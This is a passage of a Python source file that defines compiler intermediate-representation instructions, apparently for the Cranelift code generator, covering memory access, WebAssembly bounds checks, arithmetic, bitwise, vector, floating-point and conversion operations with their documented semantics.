ins=(MemFlags, p, Offset), outs=a, can_load=True)
sload32_complex = Instruction(
'sload32_complex', r"""
Load 32 bits from memory at ``sum(args) + Offset`` and sign-extend.
This is equivalent to ``load.i32`` followed by ``sextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
istore32 = Instruction(
'istore32', r"""
Store the low 32 bits of ``x`` to memory at ``p + Offset``.
This is equivalent to ``ireduce.i32`` followed by ``store.i32``.
""",
ins=(MemFlags, x, p, Offset), can_store=True)
istore32_complex = Instruction(
'istore32_complex', r"""
Store the low 32 bits of ``x`` to memory at ``sum(args) + Offset``.
This is equivalent to ``ireduce.i32`` followed by ``store.i32``.
""",
ins=(MemFlags, x, args, Offset), can_store=True)
x = Operand('x', Mem, doc='Value to be stored')
a = Operand('a', Mem, doc='Value loaded')
Offset = Operand('Offset', offset32, 'In-bounds offset into stack slot')
stack_load = Instruction(
'stack_load', r"""
Load a value from a stack slot at the constant offset.
This is a polymorphic instruction that can load any value type which
has a memory representation.
The offset is an immediate constant, not an SSA value. The memory
access cannot go out of bounds, i.e.
:math:`sizeof(a) + Offset <= sizeof(SS)`.
""",
ins=(SS, Offset), outs=a, can_load=True)
stack_store = Instruction(
'stack_store', r"""
Store a value to a stack slot at a constant offset.
This is a polymorphic instruction that can store any value type with a
memory representation.
The offset is an immediate constant, not an SSA value. The memory
access cannot go out of bounds, i.e.
:math:`sizeof(a) + Offset <= sizeof(SS)`.
""",
ins=(x, SS, Offset), can_store=True)
stack_addr = Instruction(
'stack_addr', r"""
Get the address of a stack slot.
Compute the absolute address of a byte in a stack slot. The offset must
refer to a byte inside the stack slot:
:math:`0 <= Offset < sizeof(SS)`.
""",
ins=(SS, Offset), outs=addr)
#
# Global values.
#
GV = Operand('GV', entities.global_value)
global_value = Instruction(
'global_value', r"""
Compute the value of global GV.
""",
ins=GV, outs=a)
# A specialized form of global_value instructions that only handles
# symbolic names.
symbol_value = Instruction(
'symbol_value', r"""
Compute the value of global GV, which is a symbolic value.
""",
ins=GV, outs=a)
#
# WebAssembly bounds-checked heap accesses.
#
HeapOffset = TypeVar('HeapOffset', 'An unsigned heap offset', ints=(32, 64))
H = Operand('H', entities.heap)
p = Operand('p', HeapOffset)
Size = Operand('Size', uimm32, 'Size in bytes')
heap_addr = Instruction(
'heap_addr', r"""
Bounds check and compute absolute address of heap memory.
Verify that the offset range ``p .. p + Size - 1`` is in bounds for the
heap H, and generate an absolute address that is safe to dereference.
1. If ``p + Size`` is not greater than the heap bound, return an
absolute address corresponding to a byte offset of ``p`` from the
heap's base address.
2. If ``p + Size`` is greater than the heap bound, generate a trap.
""",
ins=(H, p, Size), outs=addr)
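# A hedged sketch in textual IR (names like v0, v1 and heap0 are
# illustrative, not from this file) of the usual bounds-checked wasm load:
#
#     v1 = heap_addr.i64 heap0, v0, 4
#     v2 = load.i32 v1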
#
# WebAssembly bounds-checked table accesses.
#
TableOffset = TypeVar('TableOffset', 'An unsigned table offset', ints=(32, 64))
T = Operand('T', entities.table)
p = Operand('p', TableOffset)
Offset = Operand('Offset', offset32, 'Byte offset from element address')
table_addr = Instruction(
'table_addr', r"""
Bounds check and compute absolute address of a table entry.
Verify that the offset ``p`` is in bounds for the table T, and generate
an absolute address that is safe to dereference.
``Offset`` must be less than the size of a table element.
1. If ``p`` is not greater than the table bound, return an absolute
address corresponding to a byte offset of ``p`` from the table's
base address.
2. If ``p`` is greater than the table bound, generate a trap.
""",
ins=(T, p, Offset), outs=addr)
#
# Materializing constants.
#
N = Operand('N', imm64)
a = Operand('a', Int, doc='A constant integer scalar or vector value')
iconst = Instruction(
'iconst', r"""
Integer constant.
Create a scalar integer SSA value with an immediate constant value, or
an integer vector where all the lanes have the same value.
""",
ins=N, outs=a)
N = Operand('N', ieee32)
a = Operand('a', f32, doc='A constant f32 scalar value')
f32const = Instruction(
'f32const', r"""
Floating point constant.
Create a :type:`f32` SSA value with an immediate constant value.
""",
ins=N, outs=a)
N = Operand('N', ieee64)
a = Operand('a', f64, doc='A constant f64 scalar value')
f64const = Instruction(
'f64const', r"""
Floating point constant.
Create a :type:`f64` SSA value with an immediate constant value.
""",
ins=N, outs=a)
N = Operand('N', boolean)
a = Operand('a', Bool, doc='A constant boolean scalar or vector value')
bconst = Instruction(
'bconst', r"""
Boolean constant.
Create a scalar boolean SSA value with an immediate constant value, or
a boolean vector where all the lanes have the same value.
""",
ins=N, outs=a)
#
# Generics.
#
nop = Instruction(
'nop', r"""
Just a dummy instruction.
Note: this doesn't compile to a machine code nop.
""")
c = Operand('c', Testable, doc='Controlling value to test')
x = Operand('x', Any, doc='Value to use when `c` is true')
y = Operand('y', Any, doc='Value to use when `c` is false')
a = Operand('a', Any)
select = Instruction(
'select', r"""
Conditional select.
This instruction selects whole values. Use :inst:`vselect` for
lane-wise selection.
""",
ins=(c, x, y), outs=a)
cc = Operand('cc', intcc, doc='Controlling condition code')
flags = Operand('flags', iflags, doc='The machine\'s flag register')
selectif = Instruction(
'selectif', r"""
Conditional select, dependent on integer condition codes.
""",
ins=(cc, flags, x, y), outs=a)
x = Operand('x', Any)
copy = Instruction(
'copy', r"""
Register-register copy.
This instruction copies its input, preserving the value type.
A pure SSA-form program does not need to copy values, but this
instruction is useful for representing intermediate stages during
instruction transformations, and the register allocator needs a way of
representing register copies.
""",
ins=x, outs=a)
spill = Instruction(
'spill', r"""
Spill a register value to a stack slot.
This instruction behaves exactly like :inst:`copy`, but the result
value is assigned to a spill slot.
""",
ins=x, outs=a, can_store=True)
fill = Instruction(
'fill', r"""
Load a register value from a stack slot.
This instruction behaves exactly like :inst:`copy`, but creates a new
SSA value for the spilled input value.
""",
ins=x, outs=a, can_load=True)
src = Operand('src', regunit)
dst = Operand('dst', regunit)
regmove = Instruction(
'regmove', r"""
Temporarily divert ``x`` from ``src`` to ``dst``.
This instruction moves the location of a value from one register to
another without creating a new SSA value. It is used by the register
allocator to temporarily rearrange register assignments in order to
satisfy instruction constraints.
The register diversions created by this instruction must be undone
before the value leaves the EBB. At the entry to a new EBB, all live
values must be in their originally assigned registers.
""",
ins=(x, src, dst),
other_side_effects=True)
copy_special = Instruction(
'copy_special', r"""
Copies the contents of ''src'' register to ''dst'' register.
This instructions copies the contents of one register to another
register without involving any SSA values. This is used for copying
special registers, e.g. copying the stack register to the frame
register in a function prologue.
""",
ins=(src, dst),
other_side_effects=True)
delta = Operand('delta', Int)
adjust_sp_down = Instruction(
'adjust_sp_down', r"""
Subtracts ``delta`` offset value from the stack pointer register.
This instruction is used to adjust the stack pointer by a dynamic amount.
""",
ins=(delta,),
other_side_effects=True)
StackOffset = Operand('Offset', imm64, 'Offset from current stack pointer')
adjust_sp_up_imm = Instruction(
'adjust_sp_up_imm', r"""
Adds ``Offset`` immediate offset value to the stack pointer register.
This instruction is used to adjust the stack pointer, primarily in function
prologues and epilogues. ``Offset`` is constrained to the size of a signed
32-bit integer.
""",
ins=(StackOffset,),
other_side_effects=True)
StackOffset = Operand('Offset', imm64, 'Offset from current stack pointer')
adjust_sp_down_imm = Instruction(
'adjust_sp_down_imm', r"""
Subtracts ``Offset`` immediate offset value from the stack pointer
register.
This instruction is used to adjust the stack pointer, primarily in function
prologues and epilogues. ``Offset`` is constrained to the size of a signed
32-bit integer.
""",
ins=(StackOffset,),
other_side_effects=True)
f = Operand('f', iflags)
ifcmp_sp = Instruction(
'ifcmp_sp', r"""
Compare ``addr`` with the stack pointer and set the CPU flags.
This is like :inst:`ifcmp` where ``addr`` is the LHS operand and the stack
pointer is the RHS.
""",
ins=addr, outs=f)
regspill = Instruction(
'regspill', r"""
Temporarily divert ``x`` from ``src`` to ``SS``.
This instruction moves the location of a value from a register to a
stack slot without creating a new SSA value. It is used by the register
allocator to temporarily rearrange register assignments in order to
satisfy instruction constraints.
See also :inst:`regmove`.
""",
ins=(x, src, SS),
other_side_effects=True)
regfill = Instruction(
'regfill', r"""
Temporarily divert ``x`` from ``SS`` to ``dst``.
This instruction moves the location of a value from a stack slot to a
register without creating a new SSA value. It is used by the register
allocator to temporarily rearrange register assignments in order to
satisfy instruction constraints.
See also :inst:`regmove`.
""",
ins=(x, SS, dst),
other_side_effects=True)
#
# Vector operations
#
x = Operand('x', TxN, doc='Vector to split')
lo = Operand('lo', TxN.half_vector(), doc='Low-numbered lanes of `x`')
hi = Operand('hi', TxN.half_vector(), doc='High-numbered lanes of `x`')
vsplit = Instruction(
'vsplit', r"""
Split a vector into two halves.
Split the vector `x` into two separate values, each containing half of
the lanes from ``x``. The result may be two scalars if ``x`` only had
two lanes.
""",
ins=x, outs=(lo, hi), is_ghost=True)
Any128 = TypeVar(
'Any128', 'Any scalar or vector type with at most 128 lanes',
ints=True, floats=True, bools=True, scalars=True, simd=(1, 128))
x = Operand('x', Any128, doc='Low-numbered lanes')
y = Operand('y', Any128, doc='High-numbered lanes')
a = Operand('a', Any128.double_vector(), doc='Concatenation of `x` and `y`')
vconcat = Instruction(
'vconcat', r"""
Vector concatenation.
Return a vector formed by concatenating ``x`` and ``y``. The resulting
vector type has twice as many lanes as each of the inputs. The lanes of
``x`` appear as the low-numbered lanes, and the lanes of ``y`` become
the high-numbered lanes of ``a``.
It is possible to form a vector by concatenating two scalars.
""",
ins=(x, y), outs=a, is_ghost=True)
c = Operand('c', TxN.as_bool(), doc='Controlling vector')
x = Operand('x', TxN, doc='Value to use where `c` is true')
y = Operand('y', TxN, doc='Value to use where `c` is false')
a = Operand('a', TxN)
vselect = Instruction(
'vselect', r"""
Vector lane select.
Select lanes from ``x`` or ``y`` controlled by the lanes of the boolean
vector ``c``.
""",
ins=(c, x, y), outs=a)
x = Operand('x', TxN.lane_of())
splat = Instruction(
'splat', r"""
Vector splat.
Return a vector whose lanes are all ``x``.
""",
ins=x, outs=a)
x = Operand('x', TxN, doc='SIMD vector to modify')
y = Operand('y', TxN.lane_of(), doc='New lane value')
Idx = Operand('Idx', uimm8, doc='Lane index')
insertlane = Instruction(
'insertlane', r"""
Insert ``y`` as lane ``Idx`` in x.
The lane index, ``Idx``, is an immediate value, not an SSA value. It
must indicate a valid lane index for the type of ``x``.
""",
ins=(x, Idx, y), outs=a)
x = Operand('x', TxN)
a = Operand('a', TxN.lane_of())
extractlane = Instruction(
'extractlane', r"""
Extract lane ``Idx`` from ``x``.
The lane index, ``Idx``, is an immediate value, not an SSA value. It
must indicate a valid lane index for the type of ``x``.
""",
ins=(x, Idx), outs=a)
#
# Integer arithmetic
#
a = Operand('a', Int.as_bool())
Cond = Operand('Cond', intcc)
x = Operand('x', Int)
y = Operand('y', Int)
icmp = Instruction(
'icmp', r"""
Integer comparison.
The condition code determines if the operands are interpreted as signed
or unsigned integers.
====== ======== =====================
Signed Unsigned Condition
====== ======== =====================
eq     eq       Equal
ne     ne       Not equal
slt    ult      Less than
sge    uge      Greater than or equal
sgt    ugt      Greater than
sle    ule      Less than or equal
====== ======== =====================
When this instruction compares integer vectors, it returns a boolean
vector of lane-wise comparisons.
""",
ins=(Cond, x, y), outs=a)
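# For example, in textual IR (illustrative):
#     v2 = icmp ugt v0, v1
# yields a b1 that is true when v0 > v1, both interpreted as unsigned.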
a = Operand('a', b1)
x = Operand('x', iB)
Y = Operand('Y', imm64)
icmp_imm = Instruction(
'icmp_imm', r"""
Compare scalar integer to a constant.
This is the same as the :inst:`icmp` instruction, except one operand is
an immediate constant.
This instruction can only compare scalars. Use :inst:`icmp` for
lane-wise vector comparisons.
""",
ins=(Cond, x, Y), outs=a)
f = Operand('f', iflags)
x = Operand('x', iB)
y = Operand('y', iB)
ifcmp = Instruction(
'ifcmp', r"""
Compare scalar integers and return flags.
Compare two scalar integer values and return integer CPU flags
representing the result.
""",
ins=(x, y), outs=f)
ifcmp_imm = Instruction(
'ifcmp_imm', r"""
Compare scalar integer to a constant and return flags.
Like :inst:`icmp_imm`, but returns integer CPU flags instead of testing
a specific condition code.
""",
ins=(x, Y), outs=f)
a = Operand('a', Int)
x = Operand('x', Int)
y = Operand('y', Int)
iadd = Instruction(
'iadd', r"""
Wrapping integer addition: :math:`a := x + y \pmod{2^B}`.
This instruction does not depend on the signed/unsigned interpretation
of the operands.
""",
ins=(x, y), outs=a)
isub = Instruction(
'isub', r"""
Wrapping integer subtraction: :math:`a := x - y \pmod{2^B}`.
This instruction does not depend on the signed/unsigned interpretation
of the operands.
""",
ins=(x, y), outs=a)
imul = Instruction(
'imul', r"""
Wrapping integer multiplication: :math:`a := x y \pmod{2^B}`.
This instruction does not depend on the signed/unsigned interpretation
of the
operands.
Polymorphic over all integer types (vector and scalar).
""",
ins=(x, y), outs=a)
umulhi = Instruction(
'umulhi', r"""
Unsigned integer multiplication, producing the high half of a
double-length result.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y), outs=a)
smulhi = Instruction(
'smulhi', """
Signed integer multiplication, producing the high half of a
double-length result.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y), outs=a)
udiv = Instruction(
'udiv', r"""
Unsigned integer division: :math:`a := \lfloor {x \over y} \rfloor`.
This operation traps if the divisor is zero.
""",
ins=(x, y), outs=a, can_trap=True)
sdiv = Instruction(
'sdiv', r"""
Signed integer division rounded toward zero: :math:`a := sign(xy)
\lfloor {|x| \over |y|}\rfloor`.
This operation traps if the divisor is zero, or if the result is not
representable in :math:`B` bits two's complement. This only happens
when :math:`x = -2^{B-1}, y = -1`.
""",
ins=(x, y), outs=a, can_trap=True)
urem = Instruction(
'urem', """
Unsigned integer remainder.
This operation traps if the divisor is zero.
""",
ins=(x, y), outs=a, can_trap=True)
srem = Instruction(
'srem', """
Signed integer remainder. The result has the sign of the dividend.
This operation traps if the divisor is zero.
""",
ins=(x, y), outs=a, can_trap=True)
a = Operand('a', iB)
x = Operand('x', iB)
Y = Operand('Y', imm64)
iadd_imm = Instruction(
'iadd_imm', """
Add immediate integer.
Same as :inst:`iadd`, but one operand is an immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
imul_imm = Instruction(
'imul_imm', """
Integer multiplication by immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
udiv_imm = Instruction(
'udiv_imm', """
Unsigned integer division by an immediate constant.
This operation traps if the divisor is zero.
""",
ins=(x, Y), outs=a)
sdiv_imm = Instruction(
'sdiv_imm', """
Signed integer division by an immediate constant.
This operation traps if the divisor is zero, or if the result is not
representable in :math:`B` bits two's complement. This only happens
when :math:`x = -2^{B-1}, Y = -1`.
""",
ins=(x, Y), outs=a)
urem_imm = Instruction(
'urem_imm', """
Unsigned integer remainder with immediate divisor.
This operation traps if the divisor is zero.
""",
ins=(x, Y), outs=a)
srem_imm = Instruction(
'srem_imm', """
Signed integer remainder with immediate divisor.
This operation traps if the divisor is zero.
""",
ins=(x, Y), outs=a)
irsub_imm = Instruction(
'irsub_imm', """
Immediate reverse wrapping subtraction: :math:`a := Y - x \\pmod{2^B}`.
Also works as integer negation when :math:`Y = 0`. Use :inst:`iadd_imm`
with a negative immediate operand for the reverse immediate
subtraction.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
#
# Integer arithmetic with carry and/or borrow.
#
a = Operand('a', iB)
x = Operand('x', iB)
y = Operand('y', iB)
c_in = Operand('c_in', b1, doc="Input carry flag")
c_out = Operand('c_out', b1, doc="Output carry flag")
b_in = Operand('b_in', b1, doc="Input borrow flag")
b_out = Operand('b_out', b1, doc="Output borrow flag")
iadd_cin = Instruction(
'iadd_cin', r"""
Add integers with carry in.
Same as :inst:`iadd` with an additional carry input. Computes:
.. math::
a = x + y + c_{in} \pmod 2^B
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y, c_in), outs=a)
iadd_cout = Instruction(
'iadd_cout', r"""
Add integers with carry out.
Same as :inst:`iadd` with an additional carry output.
.. math::
a &= x + y \pmod 2^B \\
c_{out} &= x+y >= 2^B
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y), outs=(a, c_out))
iadd_carry = Instruction(
'iadd_carry', r"""
Add integers with carry in and out.
Same as :inst:`iadd` with an additional carry input and output.
.. math::
a &= x + y + c_{in} \pmod 2^B \\
c_{out} &= x + y + c_{in} >= 2^B
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y, c_in), outs=(a, c_out))
isub_bin = Instruction(
'isub_bin', r"""
Subtract integers with borrow in.
Same as :inst:`isub` with an additional borrow flag input. Computes:
.. math::
a = x - (y + b_{in}) \pmod 2^B
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y, b_in), outs=a)
isub_bout = Instruction(
'isub_bout', r"""
Subtract integers with borrow out.
Same as :inst:`isub` with an additional borrow flag output.
.. math::
a &= x - y \pmod 2^B \\
b_{out} &= x < y
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y), outs=(a, b_out))
isub_borrow = Instruction(
'isub_borrow', r"""
Subtract integers with borrow in and out.
Same as :inst:`isub` with an additional borrow flag input and output.
.. math::
a &= x - (y + b_{in}) \pmod 2^B \\
b_{out} &= x < y + b_{in}
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, y, b_in), outs=(a, b_out))
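# A hedged sketch (illustrative IR, not from this file) of how the carry
# instructions chain to form a double-width addition from two iB halves:
#
#     lo, c = iadd_cout x_lo, y_lo
#     hi    = iadd_cin  x_hi, y_hi, c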
#
# Bitwise operations.
#
# TODO: Which types should permit boolean operations? Any reason to restrict?
bits = TypeVar(
'bits', 'Any integer, float, or boolean scalar or vector type',
ints=True, floats=True, bools=True, scalars=True, simd=True)
x = Operand('x', bits)
y = Operand('y', bits)
a = Operand('a', bits)
band = Instruction(
'band', """
Bitwise and.
""",
ins=(x, y), outs=a)
bor = Instruction(
'bor', """
Bitwise or.
""",
ins=(x, y), outs=a)
bxor = Instruction(
'bxor', """
Bitwise xor.
""",
ins=(x, y), outs=a)
bnot = Instruction(
'bnot', """
Bitwise not.
""",
ins=x, outs=a)
band_not = Instruction(
'band_not', """
Bitwise and not.
Computes `x & ~y`.
""",
ins=(x, y), outs=a)
bor_not = Instruction(
'bor_not', """
Bitwise or not.
Computes `x | ~y`.
""",
ins=(x, y), outs=a)
bxor_not = Instruction(
'bxor_not', """
Bitwise xor not.
Computes `x ^ ~y`.
""",
ins=(x, y), outs=a)
# Bitwise binary ops with immediate arg.
x = Operand('x', iB)
Y = Operand('Y', imm64)
a = Operand('a', iB)
band_imm = Instruction(
'band_imm', """
Bitwise and with immediate.
Same as :inst:`band`, but one operand is an immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
bor_imm = Instruction(
'bor_imm', """
Bitwise or with immediate.
Same as :inst:`bor`, but one operand is an immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
bxor_imm = Instruction(
'bxor_imm', """
Bitwise xor with immediate.
Same as :inst:`bxor`, but one operand is an immediate constant.
Polymorphic over all scalar integer types, but does not support vector
types.
""",
ins=(x, Y), outs=a)
# Shift/rotate.
x = Operand('x', Int, doc='Scalar or vector value to shift')
y = Operand('y', iB, doc='Number of bits to shift')
Y = Operand('Y', imm64)
a = Operand('a', Int)
rotl = Instruction(
'rotl', r"""
Rotate left.
Rotate the bits in ``x`` by ``y`` places.
""",
ins=(x, y), outs=a)
rotr = Instruction(
'rotr', r"""
Rotate right.
Rotate the bits in ``x`` by ``y`` places.
""",
ins=(x, y), outs=a)
rotl_imm = Instruction(
'rotl_imm', r"""
Rotate left by immediate.
""",
ins=(x, Y), outs=a)
rotr_imm = Instruction(
'rotr_imm', r"""
Rotate right by immediate.
""",
ins=(x, Y), outs=a)
ishl = Instruction(
'ishl', r"""
Integer shift left. Shift the bits in ``x`` towards the MSB by ``y``
places. Shift in zero bits to the LSB.
The shift amount is masked to the size of ``x``.
When shifting a B-bits integer type, this instruction computes:
.. math::
s &:= y \pmod B, \\
a &:= x \cdot 2^s \pmod{2^B}.
""",
ins=(x, y), outs=a)
ushr = Instruction(
'ushr', r"""
Unsigned shift right. Shift bits in ``x`` towards the LSB by ``y``
places, shifting in zero bits to the MSB. Also called a *logical
shift*.
The shift amount is masked to the size of the register.
When shifting a B-bits integer type, this instruction computes:
.. math::
s &:= y \pmod B, \\
a &:= \lfloor x \cdot 2^{-s} \rfloor.
""",
ins=(x, y), outs=a)
sshr = Instruction(
'sshr', r"""
Signed shift right. Shift bits in ``x`` towards the LSB by ``y``
places, shifting in sign bits to the MSB. Also called an *arithmetic
shift*.
The shift amount is masked to the size of the register.
""",
ins=(x, y), outs=a)
ishl_imm = Instruction(
'ishl_imm', r"""
Integer shift left by immediate.
The shift amount is masked to the size of ``x``.
""",
ins=(x, Y), outs=a)
ushr_imm = Instruction(
'ushr_imm', r"""
Unsigned shift right by immediate.
The shift amount is masked to the size of the register.
""",
ins=(x, Y), outs=a)
sshr_imm = Instruction(
'sshr_imm', r"""
Signed shift right by immediate.
The shift amount is masked to the size of the register.
""",
ins=(x, Y), outs=a)
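# Illustrative Python model (not part of the DSL) of the masked-shift
# semantics documented above, for a B-bit integer x:
def _ishl_model(x, y, B=32):
    s = y % B                   # shift amount is masked to the type size
    return (x << s) % (1 << B)  # result wraps modulo 2**B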
#
# Bit counting.
#
x = Operand('x', iB)
a = Operand('a', iB)
bitrev = Instruction(
'bitrev', r"""
Reverse the bits of an integer.
Reverses the bits in ``x``.
""",
ins=x, outs=a)
clz = Instruction(
'clz', r"""
Count leading zero bits.
Starting from the MSB in ``x``, count the number of zero bits before
reaching the first one bit. When ``x`` is zero, returns the size of x
in bits.
""",
ins=x, outs=a)
cls = Instruction(
'cls', r"""
Count leading sign bits.
Starting from the MSB after the sign bit in ``x``, count the number of
consecutive bits identical to the sign bit. When ``x`` is 0 or -1,
returns one less than the size of x in bits.
""",
ins=x, outs=a)
ctz = Instruction(
'ctz', r"""
Count trailing zeros.
Starting from the LSB in ``x``, count the number of zero bits before
reaching the first one bit. When ``x`` is zero, returns the size of x
in bits.
""",
ins=x, outs=a)
popcnt = Instruction(
'popcnt', r"""
Population count.
Count the number of one bits in ``x``.
""",
ins=x, outs=a)
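# Illustrative Python models (not part of the DSL) of the bit-counting
# semantics above, for a non-negative B-bit value x:
def _popcnt_model(x, B=32):
    return bin(x % (1 << B)).count('1')
def _clz_model(x, B=32):
    x %= 1 << B
    return B if x == 0 else B - x.bit_length()  # zero input counts all B bits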
#
# Floating point.
#
Float = TypeVar(
'Float', 'A scalar or vector floating point number',
floats=True, simd=True)
fB = TypeVar('fB', 'A scalar floating point number', floats=True)
Cond = Operand('Cond', floatcc)
x = Operand('x', Float)
y = Operand('y', Float)
a = Operand('a', Float.as_bool())
fcmp = Instruction(
'fcmp', r"""
Floating point comparison.
Two IEEE 754-2008 floating point numbers, `x` and `y`, relate to each
other in exactly one of four ways:
== ==========================================
UN Unordered when one or both numbers is NaN.
EQ When :math:`x = y`. (And :math:`0.0 = -0.0`).
LT When :math:`x < y`.
GT When :math:`x > y`.
== ==========================================
The 14 :type:`floatcc` condition codes each correspond to a subset of
the four relations, except for the empty set which would always be
false, and the full set which would always be true.
The condition codes are divided into 7 'ordered' conditions which don't
include UN, and 7 unordered conditions which all include UN.
+-------+------------+---------+------------+-------------------------+
|Ordered             |Unordered             |Condition                |
+=======+============+=========+============+=========================+
|ord    |EQ | LT | GT|uno      |UN          |NaNs absent / present.   |
+-------+------------+---------+------------+-------------------------+
|eq     |EQ          |ueq      |UN | EQ     |Equal                    |
+-------+------------+---------+------------+-------------------------+
|one    |LT | GT     |ne       |UN | LT | GT|Not equal                |
+-------+------------+---------+------------+-------------------------+
|lt     |LT          |ult      |UN | LT     |Less than                |
+-------+------------+---------+------------+-------------------------+
|le     |LT | EQ     |ule      |UN | LT | EQ|Less than or equal       |
+-------+------------+---------+------------+-------------------------+
|gt     |GT          |ugt      |UN | GT     |Greater than             |
+-------+------------+---------+------------+-------------------------+
|ge     |GT | EQ     |uge      |UN | GT | EQ|Greater than or equal    |
+-------+------------+---------+------------+-------------------------+
The standard C comparison operators, `<, <=, >, >=`, are all ordered,
so they are false if either operand is NaN. The C equality operator,
`==`, is ordered, and since inequality is defined as the logical
inverse it is *unordered*. They map to the :type:`floatcc` condition
codes as follows:
==== ====== ============
C    `Cond` Subset
==== ====== ============
`==` eq     EQ
`!=` ne     UN | LT | GT
`<`  lt     LT
`<=` le     LT | EQ
`>`  gt     GT
`>=` ge     GT | EQ
==== ====== ============
This subset of condition codes also corresponds to the WebAssembly
floating point comparisons of the same name.
When this instruction compares floating point vectors, it returns a
boolean vector with the results of lane-wise comparisons.
""",
ins=(Cond, x, y), outs=a)
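# Illustrative sketch (not part of the DSL): the 14 `floatcc` condition codes
# expressed as subsets of the four mutually exclusive relations, using string
# tags 'UN', 'EQ', 'LT', 'GT' as an assumption for illustration. A comparison
# is true iff the actual relation is in the chosen subset; note how each
# unordered code is simply its ordered counterpart plus 'UN'.
_FLOATCC_SUBSETS = {
    'ord': {'EQ', 'LT', 'GT'}, 'uno': {'UN'},
    'eq': {'EQ'}, 'ueq': {'UN', 'EQ'},
    'one': {'LT', 'GT'}, 'ne': {'UN', 'LT', 'GT'},
    'lt': {'LT'}, 'ult': {'UN', 'LT'},
    'le': {'LT', 'EQ'}, 'ule': {'UN', 'LT', 'EQ'},
    'gt': {'GT'}, 'ugt': {'UN', 'GT'},
    'ge': {'GT', 'EQ'}, 'uge': {'UN', 'GT', 'EQ'},
}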
f = Operand('f', fflags)
ffcmp = Instruction(
'ffcmp', r"""
Floating point comparison returning flags.
Compares two numbers like :inst:`fcmp`, but returns floating point CPU
flags instead of testing a specific condition.
""",
ins=(x, y), outs=f)
x = Operand('x', Float)
y = Operand('y', Float)
z = Operand('z', Float)
a = Operand('a', Float, 'Result of applying operator to each lane')
fadd = Instruction(
'fadd', r"""
Floating point addition.
""",
ins=(x, y), outs=a)
fsub = Instruction(
'fsub', r"""
Floating point subtraction.
""",
ins=(x, y), outs=a)
fmul = Instruction(
'fmul', r"""
Floating point multiplication.
""",
ins=(x, y), outs=a)
fdiv = Instruction(
'fdiv', r"""
Floating point division.
Unlike the integer division instructions :clif:inst:`sdiv` and
:clif:inst:`udiv`, this can't trap. Division by zero is infinity or
NaN, depending on the dividend.
""",
ins=(x, y), outs=a)
sqrt = Instruction(
'sqrt', r"""
Floating point square root.
""",
ins=x, outs=a)
fma = Instruction(
'fma', r"""
Floating point fused multiply-and-add.
Computes :math:`a := xy+z` without any intermediate rounding of the
product.
""",
ins=(x, y, z), outs=a)
a = Operand('a', Float, '``x`` with its sign bit inverted')
fneg = Instruction(
'fneg', r"""
Floating point negation.
Note that this is a pure bitwise operation.
""",
ins=x, outs=a)
a = Operand('a', Float, '``x`` with its sign bit cleared')
fabs = Instruction(
'fabs', r"""
Floating point absolute value.
Note that this is a pure bitwise operation.
""",
ins=x, outs=a)
a = Operand('a', Float, '``x`` with its sign bit changed to that of ``y``')
fcopysign = Instruction(
'fcopysign', r"""
Floating point copy sign.
Note that this is a pure bitwise operation. The sign bit from ``y`` is
copied to the sign bit of ``x``.
""",
ins=(x, y), outs=a)
a = Operand('a', Float, 'The smaller of ``x`` and ``y``')
fmin = Instruction(
'fmin', r"""
Floating point minimum, propagating NaNs.
If either operand is NaN, this returns a NaN.
""",
ins=(x, y), outs=a)
a = Operand('a', Float, 'The larger of ``x`` and ``y``')
fmax = Instruction(
'fmax', r"""
Floating point maximum, propagating NaNs.
If either operand is NaN, this returns a NaN.
""",
ins=(x, y), outs=a)
a = Operand('a', Float, '``x`` rounded to integral value')
ceil = Instruction(
'ceil', r"""
Round floating point to an integral value, towards positive infinity.
""",
ins=x, outs=a)
floor = Instruction(
'floor', r"""
Round floating point to an integral value, towards negative infinity.
""",
ins=x, outs=a)
trunc = Instruction(
'trunc', r"""
Round floating point to an integral value, towards zero.
""",
ins=x, outs=a)
nearest = Instruction(
'nearest', r"""
Round floating point to an integral value, towards nearest with ties to
even.
""",
ins=x, outs=a)
#
# CPU flag operations
#
Cond = Operand('Cond', intcc)
f = Operand('f', iflags)
a = Operand('a', b1)
trueif = Instruction(
'trueif', r"""
Test integer CPU flags for a specific condition.
Check the CPU flags in ``f`` against the ``Cond`` condition code and
return true when the condition code is satisfied.
""",
ins=(Cond, f), outs=a)
Cond = Operand('Cond', floatcc)
f = Operand('f', fflags)
trueff = Instruction(
'trueff', r"""
Test floating point CPU flags for a specific condition.
Check the CPU flags in ``f`` against the ``Cond`` condition code and
return true when the condition code is satisfied.
""",
ins=(Cond, f), outs=a)
#
# Conversions
#
x = Operand('x', Mem)
a = Operand('a', MemTo, 'Bits of `x` reinterpreted')
bitcast = Instruction(
'bitcast', r"""
Reinterpret the bits in `x` as a different type.
The input and output types must be storable to memory and of the same
size. A bitcast is equivalent to storing one type and loading the other
type from the same address.
""",
ins=x, outs=a)
Bool = TypeVar(
'Bool',
'A scalar or vector boolean type',
bools=True, simd=True)
BoolTo = TypeVar(
'BoolTo',
'A smaller boolean type with the same number of lanes',
bools=True, simd=True)
x = Operand('x', Bool)
a = Operand('a', BoolTo)
breduce = Instruction(
'breduce', r"""
Convert `x` to a smaller boolean type in the platform-defined way.
The result type must have the same number of vector lanes as the input,
and each lane must not have more bits than the input lanes. If the
input and output types are the same, this is a no-op.
""", ins=x, outs=a, constraints=WiderOrEq(Bool, BoolTo))
BoolTo = TypeVar(
'BoolTo',
'A larger boolean type with the same number of lanes',
bools=True, simd=True)
x = Operand('x', Bool)
a = Operand('a', BoolTo)
bextend = Instruction(
'bextend', r"""
Convert `x` to a larger boolean type in the platform-defined way.
The result type must have the same number of vector lanes as the input,
and each lane must not have fewer bits than the input lanes. If the
